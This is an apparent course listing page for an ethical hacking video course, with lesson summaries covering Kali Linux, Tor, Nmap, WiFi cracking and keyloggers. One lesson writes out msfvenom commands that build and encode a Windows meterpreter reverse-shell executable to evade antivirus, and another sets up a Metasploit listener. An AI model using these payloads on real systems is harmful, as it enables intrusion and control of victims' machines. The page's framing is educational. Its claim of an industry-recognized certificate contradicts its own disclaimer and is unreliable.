Complete Ethical Hacking Course 2025 : Go From Zero to Hero
- Description
- Curriculum
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DISCLAIMER-This course is strictly for educational purposes and does not support any illegal activities. Participants are expected to use the knowledge responsibly, within legal and ethical boundaries. Completion of the course does not guarantee success in the field of ethical hacking. Some course exercises may involve security risks. The provided certificate is for course achievement and not an industry-recognized certification.
Are you ready to embark on an exciting journey into the world of ethical hacking? The “Complete Ethical Hacking Course 2024: Zero to Hero” is your ultimate gateway to becoming a proficient ethical hacker. Whether you’re a complete beginner or have some prior cybersecurity knowledge, this course is carefully designed to take you from ground zero to a heroic level of expertise in the field of ethical hacking.
Gain the ability to do ethical hacking and penetration testing by taking this course! Get answers from an experienced IT expert to every single question you have related to the learning you do in this course including installing Kali Linux, using VirtualBox, basics of Linux, Tor, Proxychains, VPN, Macchanger, Nmap, cracking wifi, aircrack, DoS attacks, SLL strip, known vulnerabilities, SQL injections, cracking Linux passwords, and more topics that are added every month!
Course Highlights:
1. Starting from Scratch: This course is tailored to cater to individuals with no prior hacking experience. You’ll begin with the basics, ensuring everyone is on the same page.
2. Comprehensive Curriculum: The course covers an extensive range of topics, including networking fundamentals, information gathering, scanning and enumeration, vulnerability assessment, exploitation, web application hacking, wireless network hacking, social engineering, and much more.
3. Hands-On Practice: We believe in learning by doing. You’ll engage in practical exercises and real-world simulations to apply your newfound knowledge and skills.
4. Up-to-Date Content: In the fast-evolving field of ethical hacking, staying current is vital. This course includes the latest tools and techniques relevant to 2024 to ensure you’re prepared for today’s cybersecurity challenges.
5. Legal and Ethical Considerations: You’ll learn the importance of conducting ethical hacking within the boundaries of the law and ethical guidelines, emphasizing responsible hacking practices.
6. Industry-Recognized Certification: Upon completion, you’ll receive a certificate of achievement, showcasing your expertise and commitment to ethical hacking.
7. Career Opportunities: By the end of this course, you’ll be equipped to pursue a career in cybersecurity, including roles such as ethical hacker, penetration tester, security analyst, or consultant. Additionally, you can leverage this knowledge to enhance the security of your personal and business systems.
You get lifetime access to this course which already has HD video tutorials sharing everything you need to be a penetration testing expert and ethical hacker!This is my 1st ever course created but don’t,worry i have made it fantastic you’ll love this course i will be there with you through out the course and will help you answer every single question possible don’t worry if you have any doubts PLEASE ask in the Q&A section.
NOTE: This course is totally a product of Ramsai Dupati and no other organisation is associated with it or a certification exam. Although, you will receive a Course Completion Certification from Udemy, apart from that NO OTHER ORGANISATION IS INVOLVED.
What will you get-Full Life time access,Access on mobile and TV,English subtitles available,and the best part is Certificate of Completion.
With this course you’ll get 24/7 support, so if you have any questions you can post them in the Q&A section.
Thank you for taking the time to read this, and we hope to see you in the course!
1IntroductionVideo lesson
In this lecture, I will introduce you to the course itself. During this course, I will teach you how to penetrate networks, exploit systems, break into computers, routers, etc. I will go over the terminology and show you how to set up your virtual environment.
The definition of hacking is quite broad. The act of hacking is actually having any system, not just computers. Literally any system having it do something that you intended it to do as opposed to what it was designed to do. The ethical side of hacking would be when you have a permission to do it - when it's within the constraints of the law.
2Why learn ethical hacking!Video lesson
3Basic terminology such as White Hat,Black Hat and Grey Hat Hacking.Video lesson
In this lecture, I will start you off with basic terms used in ethical hacking
I will be talking about some of the basic terms which you will need order to follow this course through. I will go over the three different types of hackers: White Hat Hackers, Grey Hat Hackers and Black Hat Hackers. Everything that we will be doing in this course falls in the white hat category, which include people such pen testers, ethical hackers - people like you and me. The activities of Grey Hat Hacker border between legal and illegal. Black Hat Hackers conduct all sorts of illegal activities: extract new information from certain servers credentials, your card information, take services down usually to extract some sort of financial gain, etc.
I will also go over footprinting, DoS, DDoS, RAT, fishing, rootkit, etc. -
4Basic Terminology including SQL injections,VPN'S,Malware, Virus and key loggersVideo lesson
5Needed SoftwareVideo lesson
6Installing Virtual Box on Windows 10Video lesson
How to install VirtualBox in a Windows environment
In this lecture, I will show you how to install VirtualBox within a Windows environment. Previously I showed you how to do it in a Linux environment, which is a bit more complex because you do need to add repositories and then pull the packet from the repositories. However in Windows, the process is fairly straightforward and simple.
7Kali Linux installation within a virtual environment.Video lesson
How to install Kali Linux within a virtual environment.
In this lecture, I will continue with the installation of Kali Linux within a virtual environment. I will also go over more of the things you need to know about this installation. In the following lecture, after the installation is complete, I will show you how to configure it and introduce you to its interface.
8Install and configure Kali LinuxVideo lesson
How to configure Kali Linux in a virtual environment.
In this lecture, I will continue where we left off in the installation process of Kali Linux in a virtual environment. Now I will show you how to configure Kali Linux, as well as introduce you to the interface. I will also begin walking you through how to do the updates.
9Getting started successfully PDF with common questions answered and helpful tipsText lesson
11Learn to Install TOR on Kali LinuxVideo lesson
Tor, short for The Onion Router, is free and open-source software for enabling anonymous communication. It directs Internet traffic via a free, worldwide, volunteer overlay network that consists of more than seven thousand relays. Using Tor makes it more difficult to trace a user's Internet activity.
12Using Tor to Access The Hidden Wiki and Dark WebVideo lesson
The first Hidden Wiki was operated through the .onion pseudo top-level domain which can be accessed only by using Tor or a Tor gateway. Its main page provided a community-maintained link directory to other hidden services, including links claiming to offer money laundering, contract killing, cyber-attacks for hire, contraband chemicals, and bomb making. The rest of the wiki was essentially uncensored as well and also offered links to sites hosting child pornography and abuse images.
18Connecting a Wireless Network AdapterVideo lesson
19Enable moniter Mode on your Network AdapterVideo lesson
Enabling Monitor Mode helps with spying and sniffing around the network and the router. There are various ways to enable the Monitor Mode in Kali Linux Operating System. Different adapters have different enabling ways to enable Monitor Mode. A few ways to enable Monitor Mode are using iwconfig, airmon-ng, and iw.
20How to enable Moniter Mode Manual MethodVideo lesson
21Nmap-1Video lesson
Nmap is a network scanner created by Gordon Lyon. Nmap is used to discover hosts and services on a computer network by sending packets and analyzing the responses. Nmap provides a number of features for probing computer networks, including host discovery and service and operating system detection.
22Nmap Advanced ScanningVideo lesson
Advanced Port Scanner is a free network scanner allowing you to quickly find open ports on network computers and retrieve versions of programs running on the detected ports. The program has a user-friendly interface and rich functionality.
23WiFi Hacking IntroductionVideo lesson
Wireless security is the prevention of unauthorized access or damage to computers or data using wireless networks, which include Wi-Fi networks. The term may also refer to the protection of the wireless network itself from adversaries seeking to damage the confidentiality, integrity, or availability of the network. The most common type is Wi-Fi security, which includes Wired Equivalent Privacy (WEP) and Wi-Fi Protected Access (WPA).
WEP is an old IEEE 802.11 standard from 1997. It is a notoriously weak security standard: the password it uses can often be cracked in a few minutes with a basic laptop computer and widely available software tools.WEP was superseded in 2003 by WPA, a quick alternative at the time to improve security over WEP.
The current standard is WPA2; some hardware cannot support WPA2 without firmware upgrade or replacement. WPA2 uses an encryption device that encrypts the network with a 256-bit key; the longer key length improves security over WEP. Enterprises often enforce security using a certificate-based system to authenticate the connecting device, following the standard 802.11X.
24Attack WiFi with Fern Wifi HackerVideo lesson
Fern-Wifi-Cracker is designed to be used in testing and discovering flaws in one's own network with the aim of fixing the flaws detected, DO NOT use the program on networks for which you don't have permission, I am not responsible for whatever damage you cause by using this software.
25Word Lists-BopscrkVideo lesson
26Creating Worlists-rockyouVideo lesson
27Use Aircrack_ngVideo lesson
Configuring your wireless network card to crack WiFi
Now that we have all the prep work done, our tools installed and system set up, I am now going to show you how to crack WiFi. In this tutorial, we will begin by configuring our wireless network cord. I will walk you through the whole process. Then we will continue on in the next tutorial, where I will show you how to perform a specific scan and capture a file that we will use to crack the encryption.
32(Keylogger)-Use Beelogger and get the Key StrokesVideo lesson
A keylogger is a form of malware or hardware that keeps track of and records your keystrokes as you type. It takes the information and sends it to a hacker using a command-and-control (C&C) server.
33Retried-(Key Logger)-Beelogger.Video lesson
A keylogger is a form of malware or hardware that keeps track of and records your keystrokes as you type. It takes the information and sends it to a hacker using a command-and-control (C&C) server.
35Metasploit-1Video lesson
36Use Metasploit Payload and Gain Access to Android devicesVideo lesson
37Use AndroRat and gain access to android device!Video lesson
38Access windows through curlVideo lesson
curl is a versatile command-line tool used for transferring data with URLs. It supports various protocols, including HTTP, HTTPS, FTP, and more. While curl is more commonly associated with Linux environments, it can also be used in Windows to perform a wide range of tasks, including sending HTTP requests, downloading files, and interacting with web APIs.
Using curl on Windows:
Basic curl Commands:
Get a Web Page: You can use curl to fetch the content of a web page:
bashCopy codecurl
Download a File: Download a file from a URL:
bashCopy codecurl -O
Send a POST Request: Send data via a POST request to a web server:
bashCopy codecurl -X POST -d "param1=value1¶m2=value2"
Using curl to Access Windows Resources:
Accessing Web Services: If a Windows machine is running a web server (IIS, Apache, etc.), you can use curl to interact with web services hosted on it.
bashCopy codecurl https://<Windows_IP_or_Hostname>/service
Downloading Files from a Windows Server: If the Windows machine serves files over HTTP or FTP, curl can be used to download them:
bashCopy codecurl -O https://<Windows_IP_or_Hostname>/path/to/file.txt
Executing Remote Commands: While curl itself can't directly execute remote commands on Windows, you can use it in combination with a web service that triggers commands on the server-side.
Using curl with PowerShell:
Windows 10 and later versions include curl natively, but it can also be used within PowerShell to perform tasks:
powershellCopy codecurl.exe -o output.html
Using curl for REST APIs:
If you need to interact with a REST API hosted on a Windows server, curl can be used to make GET, POST, PUT, DELETE, and other requests:
bashCopy codecurl -X GET https://<Windows_IP_or_Hostname>/api/resource
Accessing SMB Shares:
curl itself does not support SMB (Server Message Block) protocol directly. To interact with SMB shares on Windows, tools like smbclient (part of the Samba suite) or PowerShell commands (e.g., Get-SmbShare) are typically used.
39Msf Venom Gain ControlVideo lesson
msfvenom is a powerful tool within the Metasploit framework used to create custom payloads for exploiting vulnerabilities on target systems. These payloads can be embedded into various file formats or executed directly to gain control over a compromised system. The tool combines the functionalities of msfpayload and msfencode to allow users to generate and encode payloads in one step, making it a versatile tool for penetration testing and ethical hacking.
How Msfvenom Works:
Creating a Payload:
msfvenom can generate payloads in various formats, such as executables, scripts, and shellcode. A common use case is to create a reverse shell payload that, when executed on the target machine, connects back to the attacker's machine, giving them control over the system.
Example command to generate a Windows reverse shell payload:
bashCopy codemsfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your_IP> LPORT=<Port> -f exe -o shell.exe
-p specifies the payload, LHOST is the attacker's IP address, LPORT is the port on which the attacker will listen, -f specifies the format (e.g., exe for Windows executables), and -o specifies the output file.
Encoding the Payload:
To avoid detection by antivirus software, msfvenom allows you to encode the payload using various encoders. This can help bypass basic signature-based detection methods.
Example command to encode the payload:
bashCopy codemsfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your_IP> LPORT=<Port> -e x86/shikata_ga_nai -i 3 -f exe -o encoded_shell.exe
Here, -e specifies the encoder, and -i specifies the number of iterations of encoding.
Delivering the Payload:
Once the payload is generated and encoded, it needs to be delivered to the target system. This can be done through social engineering, phishing emails, exploiting vulnerabilities, or other delivery methods.
The payload could be hidden in an executable file, a macro-enabled document, or a script.
Gaining Control:
After the target executes the payload, it initiates a connection back to the attacker's machine. The attacker typically sets up a listener using Metasploit’s multi/handler to catch the incoming connection.
Example command to start a listener in Metasploit:
bashCopy codeuse exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <Your_IP>
set LPORT <Port>
Once the connection is established, the attacker gains control of the target system via a Meterpreter session, allowing them to execute commands, upload/download files, and perform other actions on the compromised system.
Ethical Considerations:
It's crucial to note that using msfvenom and Metasploit for unauthorized access to systems is illegal and unethical. These tools should only be used for penetration testing on systems where you have explicit permission to do so.
40Encryption In Windows 10 PGPVideo lesson
In cryptography, encryption is the process of encoding information. This process converts the original representation of the information, known as plaintext, into an alternative form known as ciphertext. Ideally, only authorized parties can decipher a ciphertext back to plaintext and access the original information.
41Kali Linux-GNUVideo lesson